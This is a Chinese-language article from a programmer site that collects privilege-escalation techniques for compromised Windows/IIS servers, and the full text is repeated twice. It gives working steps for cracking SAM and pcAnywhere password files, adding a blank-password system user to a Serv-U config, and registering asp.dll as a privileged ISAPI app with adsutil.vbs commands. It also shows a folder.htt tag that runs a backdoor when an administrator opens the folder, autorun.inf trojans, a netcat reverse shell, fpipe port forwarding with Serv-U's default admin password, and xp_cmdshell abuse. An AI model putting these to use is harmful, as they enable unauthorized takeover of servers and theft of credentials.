总结各大高手的提权思路
程序员文章站
2022-04-07 07:58:23
c: d: e:.....
C:Documents and SettingsAll Users「开始」菜单程序
看这里能不能跳转,我们从这里可以获取好多有用的信息比如Serv-U的路径,
C:Documents and SettingsAll Use... 08-10-08...
c: d: e:.....
c:\documents and settings\all users\「开始」菜单\程序\
看这里能不能跳转,我们从这里可以获取好多有用的信息比如serv-u的路径,
c:\documents and settings\all users\application data\symantec\pcanywhere\
看能否跳转到这个目录,如果行那就最好了,直接下它的cif文件,破解得到pcanywhere密码,登陆
c:\program files\serv-u\
c:\winnt\system32\config\
下它的sam,破解密码
c:\winnt\system32\inetsrv\data\
是erveryone 完全控制,很多时候没作限制,把提升权限的工具上传上去,然后执行
c:\prel
c:\program files\java web start\
c:\documents and settings\
c:\documents and settings\all users\
c:\winnt\system32\inetsrv\data\
c:\program files\
c:\program files\serv-u\
c:\program files\microsoft sql server\
c:\temp\
c:\mysql\(如果服务器支持php)
c:\php(如果服务器支持php)
运行"cscript c:\inetpub\adminscripts\adsutil.vbs get w3svc/inprocessisapiapps"来提升权限
还可以用这段代码试提升,好象不是很理想的
如果主机设置很变态,可以试下在c:\documents and settings\all users\「开始」菜单\程序\启动"写入bat,vbs等木马。
根目录下隐藏autorun.inf
c:\program files\kv2004\ 绑
d:\program files\rising\rav\
c:\program files\real\realserver\
rar
folder.htt与desktop.ini
将改写的folder.htt与desktop.ini,还有你的木马或者是vbs或者是什么,放到对方管理员最可能浏览的目录下
replace 替换法 捆绑
脚本 编写一个启动/关机脚本 重起
删sam :( 错
cacls命令
flashfxp文件夹sites.dat sites.dat.bak stats.dat stats.dat.bak
ring的权限提升21大法!
以下全部是本人提权时候的总结 很多方法至今没有机会试验也没有成功,但是我是的确看见别人成功过
的。本人不才,除了第一种方法自己研究的,其他的都是别人的经验总结。希望对朋友有帮助!
1.radmin连接法
条件是你权限够大,对方连防火墙也没有。封装个radmin上去,运行,开对方端口,然后radmin上去
。本人从来米成功过。,端口到是给对方打开了。
2.paanywhere
c:\documents and settings\all users\application data\symantec\pcanywhere\ 这里下他的gif
文件,在本地安装pcanywhere上去
3.sam破解
c:\winnt\system32\config\ 下他的sam 破解之
4.su密码夺取
c:\documents and settings\all users\「开始」菜单\程序\
引用:serv-u,然后本地查看属性,知道路径后,看能否跳转
进去后,如果有权限修改servudaemon.ini,加个用户上去,密码为空
[user=wekwen|1]
password=
homedir=c:\
timeout=600
maintenance=system
access1=c:\|rwamelcdp
access1=d:\|rwamelcdp
access1=f:\|rwamelcdp
skeyvalues=
这个用户具有最高权限,然后我们就可以ftp上去 quote site exec xxx 来提升权限
5.c:\winnt\system32\inetsrv\data\
引用:就是这个目录,同样是erveryone 完全控制,我们所要做的就是把提升权限的工具上传上去,
然后执行
6.su溢出提权
这个网上教程n多 不详细讲解了
7.运行csript
引用:运行"cscript c:\inetpub\adminscripts\adsutil.vbs get w3svc/inprocessisapiapps"来提
升权限
用这个cscript c:\inetpub\adminscripts\adsutil.vbs get w3svc/inprocessisapiapps
查看有特权的dll文件:idq.dll httpext.dll httpodbc.dll ssinc.dll msw3prt.dll
再将asp.dll加入特权一族
asp.dll是放在c:\winnt\system32\inetsrv\asp.dll (不同的机子放的位置不一定一样)
我们现在加进去cscript adsutil.vbs set /w3svc/inprocessisapiapps "c:\winnt\system32\idq.dll"
"c:\winnt\system32\inetsrv\httpext.dll" "c:\winnt\system32\inetsrv\httpodbc.dll"
"c:\winnt\system32\inetsrv\ssinc.dll" "c:\winnt\system32\msw3prt.dll""c:\winnt\system32
\inetsrv\asp.dll"
可以用cscript adsutil.vbs get /w3svc/inprocessisapiapps 来查看是不是加进去了
8.脚本提权
c:\documents and settings\all users\「开始」菜单\程序\启动"写入bat,vbs
9.vnc
这个是小花的文章 hoho
默认情况下vnc密码存放在hkcu\software\orl\winvnc3\password
我们可以用vncx4
破解它,vncx4使用很简单,只要在命令行下输入
c:\>vncx4 -w
然后顺序输入上面的每一个十六进制数据,没输完一个回车一次就行了。
10.nc提权
给对方来个nc 但是条件是你要有足够的运行权限 然后把它反弹到自己的电脑上 hoho ok了
11.社会工程学之guest提权
很简单 查看他的拥护 一般来说 看到帐户以后 密码尽量猜 可能用户密码一样 也可能是他qq号 邮
箱号 手机号 尽量看看 hoho
12.ipc空连接
如果对方真比较白痴的话 扫他的ipc 如果运气好还是弱口令
13.替换服务
这个不用说了吧?个人感觉相当复杂
14.autorun .inf
autorun=xxx.exe 这个=后面自己写 hoho 加上只读、系统、隐藏属性 传到哪个盘都可以的 不相信
他不运行
15.desktop.ini与folder.htt
引用:首先,我们现在本地建立一个文件夹,名字不重要,进入它,在空白处点右键,选择“自定义
文件夹”(xp好像是不行的)一直下点,默认即可。完成后,你就会看到在此目录下多了两个名为folder
setting的文件架与desktop.ini的文件,(如果你看不到,先取消“隐藏受保护的操作系统文件”)然后
我们在folder setting目录下找到folder.htt文件,记事本打开,在任意地方加入以下代码: <object
id=”runit” width=0 height=0 type=”application/x-oleobject” codebase=”你的后门文件名”>
</object> 然后你将你的后门文件放在folder setting目录下,把此目录与desktop.ini一起上传到对方
任意一个目录下,就可以了,只要等管理员浏览了此目录,它就执行了我们的后门
16.su覆盖提权
本地安装个su,将你自己的servudaemon.ini文件用从他那下载下来的servudaemon.ini 覆盖掉,重
起一下serv-u,于是你上面的所有配置都与他的一模一样了
17.su转发端口
43958这个是 serv -u 的本地管理端口。fpipe.exe上传他,执行命令: fpipe –v –l 3333 –r
43958 127.0.0.1 意思是将4444端口映射到43958端口上。 然后就可以在本地安装一个serv-u,新建一个
服务器,ip填对方ip,帐号为localadministrator 密码为#1@$ak#.1k;0@p 连接上后你就可以管理他的
serv-u了
18.sql帐户密码泄露
如果对方开了mssql服务器,我们就可以通过用sql连接器加管理员帐号(可以从他的连接数据库的
asp文件中看到),因为mssql是默认的system权限。
引用:对方没有删除xp_cmdshell 方法:使用sqlexec.exe,在host 一栏中填入对方ip,user与pass
中填入你所得到的用户名与密码。format选择xp_cmdshell”%s”即可。然后点击connect,连接上后就可
以在cmd一栏中输入你想要的cmd命令了
19.asp.dll
引用:因为asp.dll是放在c:\winnt\system32\inetsrv\asp.dll (不同的机子放的位置不一定相同
)
我们现在加进去cscript adsutil.vbs set /w3svc/inprocessisapiapps "c:\winnt\system32\idq.dll"
"c:\winnt\system32\inetsrv\httpext.dll" "c:\winnt\system32\inetsrv\httpodbc.dll"
"c:\winnt\system32\inetsrv\ssinc.dll" "c:\winnt\system32\msw3prt.dll""c:\winnt\system32
\inetsrv\asp.dll"
好了,现在你可以用cscript adsutil.vbs get /w3svc/inprocessisapiapps 来查看是不是加进去
c:\documents and settings\all users\「开始」菜单\程序\
看这里能不能跳转,我们从这里可以获取好多有用的信息比如serv-u的路径,
c:\documents and settings\all users\application data\symantec\pcanywhere\
看能否跳转到这个目录,如果行那就最好了,直接下它的cif文件,破解得到pcanywhere密码,登陆
c:\program files\serv-u\
c:\winnt\system32\config\
下它的sam,破解密码
c:\winnt\system32\inetsrv\data\
是erveryone 完全控制,很多时候没作限制,把提升权限的工具上传上去,然后执行
c:\prel
c:\program files\java web start\
c:\documents and settings\
c:\documents and settings\all users\
c:\winnt\system32\inetsrv\data\
c:\program files\
c:\program files\serv-u\
c:\program files\microsoft sql server\
c:\temp\
c:\mysql\(如果服务器支持php)
c:\php(如果服务器支持php)
运行"cscript c:\inetpub\adminscripts\adsutil.vbs get w3svc/inprocessisapiapps"来提升权限
还可以用这段代码试提升,好象不是很理想的
如果主机设置很变态,可以试下在c:\documents and settings\all users\「开始」菜单\程序\启动"写入bat,vbs等木马。
根目录下隐藏autorun.inf
c:\program files\kv2004\ 绑
d:\program files\rising\rav\
c:\program files\real\realserver\
rar
folder.htt与desktop.ini
将改写的folder.htt与desktop.ini,还有你的木马或者是vbs或者是什么,放到对方管理员最可能浏览的目录下
replace 替换法 捆绑
脚本 编写一个启动/关机脚本 重起
删sam :( 错
cacls命令
flashfxp文件夹sites.dat sites.dat.bak stats.dat stats.dat.bak
ring的权限提升21大法!
以下全部是本人提权时候的总结 很多方法至今没有机会试验也没有成功,但是我是的确看见别人成功过
的。本人不才,除了第一种方法自己研究的,其他的都是别人的经验总结。希望对朋友有帮助!
1.radmin连接法
条件是你权限够大,对方连防火墙也没有。封装个radmin上去,运行,开对方端口,然后radmin上去
。本人从来米成功过。,端口到是给对方打开了。
2.paanywhere
c:\documents and settings\all users\application data\symantec\pcanywhere\ 这里下他的gif
文件,在本地安装pcanywhere上去
3.sam破解
c:\winnt\system32\config\ 下他的sam 破解之
4.su密码夺取
c:\documents and settings\all users\「开始」菜单\程序\
引用:serv-u,然后本地查看属性,知道路径后,看能否跳转
进去后,如果有权限修改servudaemon.ini,加个用户上去,密码为空
[user=wekwen|1]
password=
homedir=c:\
timeout=600
maintenance=system
access1=c:\|rwamelcdp
access1=d:\|rwamelcdp
access1=f:\|rwamelcdp
skeyvalues=
这个用户具有最高权限,然后我们就可以ftp上去 quote site exec xxx 来提升权限
5.c:\winnt\system32\inetsrv\data\
引用:就是这个目录,同样是erveryone 完全控制,我们所要做的就是把提升权限的工具上传上去,
然后执行
6.su溢出提权
这个网上教程n多 不详细讲解了
7.运行csript
引用:运行"cscript c:\inetpub\adminscripts\adsutil.vbs get w3svc/inprocessisapiapps"来提
升权限
用这个cscript c:\inetpub\adminscripts\adsutil.vbs get w3svc/inprocessisapiapps
查看有特权的dll文件:idq.dll httpext.dll httpodbc.dll ssinc.dll msw3prt.dll
再将asp.dll加入特权一族
asp.dll是放在c:\winnt\system32\inetsrv\asp.dll (不同的机子放的位置不一定一样)
我们现在加进去cscript adsutil.vbs set /w3svc/inprocessisapiapps "c:\winnt\system32\idq.dll"
"c:\winnt\system32\inetsrv\httpext.dll" "c:\winnt\system32\inetsrv\httpodbc.dll"
"c:\winnt\system32\inetsrv\ssinc.dll" "c:\winnt\system32\msw3prt.dll""c:\winnt\system32
\inetsrv\asp.dll"
可以用cscript adsutil.vbs get /w3svc/inprocessisapiapps 来查看是不是加进去了
8.脚本提权
c:\documents and settings\all users\「开始」菜单\程序\启动"写入bat,vbs
9.vnc
这个是小花的文章 hoho
默认情况下vnc密码存放在hkcu\software\orl\winvnc3\password
我们可以用vncx4
破解它,vncx4使用很简单,只要在命令行下输入
c:\>vncx4 -w
然后顺序输入上面的每一个十六进制数据,没输完一个回车一次就行了。
10.nc提权
给对方来个nc 但是条件是你要有足够的运行权限 然后把它反弹到自己的电脑上 hoho ok了
11.社会工程学之guest提权
很简单 查看他的拥护 一般来说 看到帐户以后 密码尽量猜 可能用户密码一样 也可能是他qq号 邮
箱号 手机号 尽量看看 hoho
12.ipc空连接
如果对方真比较白痴的话 扫他的ipc 如果运气好还是弱口令
13.替换服务
这个不用说了吧?个人感觉相当复杂
14.autorun .inf
autorun=xxx.exe 这个=后面自己写 hoho 加上只读、系统、隐藏属性 传到哪个盘都可以的 不相信
他不运行
15.desktop.ini与folder.htt
引用:首先,我们现在本地建立一个文件夹,名字不重要,进入它,在空白处点右键,选择“自定义
文件夹”(xp好像是不行的)一直下点,默认即可。完成后,你就会看到在此目录下多了两个名为folder
setting的文件架与desktop.ini的文件,(如果你看不到,先取消“隐藏受保护的操作系统文件”)然后
我们在folder setting目录下找到folder.htt文件,记事本打开,在任意地方加入以下代码: <object
id=”runit” width=0 height=0 type=”application/x-oleobject” codebase=”你的后门文件名”>
</object> 然后你将你的后门文件放在folder setting目录下,把此目录与desktop.ini一起上传到对方
任意一个目录下,就可以了,只要等管理员浏览了此目录,它就执行了我们的后门
16.su覆盖提权
本地安装个su,将你自己的servudaemon.ini文件用从他那下载下来的servudaemon.ini 覆盖掉,重
起一下serv-u,于是你上面的所有配置都与他的一模一样了
17.su转发端口
43958这个是 serv -u 的本地管理端口。fpipe.exe上传他,执行命令: fpipe –v –l 3333 –r
43958 127.0.0.1 意思是将4444端口映射到43958端口上。 然后就可以在本地安装一个serv-u,新建一个
服务器,ip填对方ip,帐号为localadministrator 密码为#1@$ak#.1k;0@p 连接上后你就可以管理他的
serv-u了
18.sql帐户密码泄露
如果对方开了mssql服务器,我们就可以通过用sql连接器加管理员帐号(可以从他的连接数据库的
asp文件中看到),因为mssql是默认的system权限。
引用:对方没有删除xp_cmdshell 方法:使用sqlexec.exe,在host 一栏中填入对方ip,user与pass
中填入你所得到的用户名与密码。format选择xp_cmdshell”%s”即可。然后点击connect,连接上后就可
以在cmd一栏中输入你想要的cmd命令了
19.asp.dll
引用:因为asp.dll是放在c:\winnt\system32\inetsrv\asp.dll (不同的机子放的位置不一定相同
)
我们现在加进去cscript adsutil.vbs set /w3svc/inprocessisapiapps "c:\winnt\system32\idq.dll"
"c:\winnt\system32\inetsrv\httpext.dll" "c:\winnt\system32\inetsrv\httpodbc.dll"
"c:\winnt\system32\inetsrv\ssinc.dll" "c:\winnt\system32\msw3prt.dll""c:\winnt\system32
\inetsrv\asp.dll"
好了,现在你可以用cscript adsutil.vbs get /w3svc/inprocessisapiapps 来查看是不是加进去
上一篇: 如何注意网站建设当中的猫腻的方法
下一篇: 浅析影响搜索引擎排名的3大重要因素
推荐阅读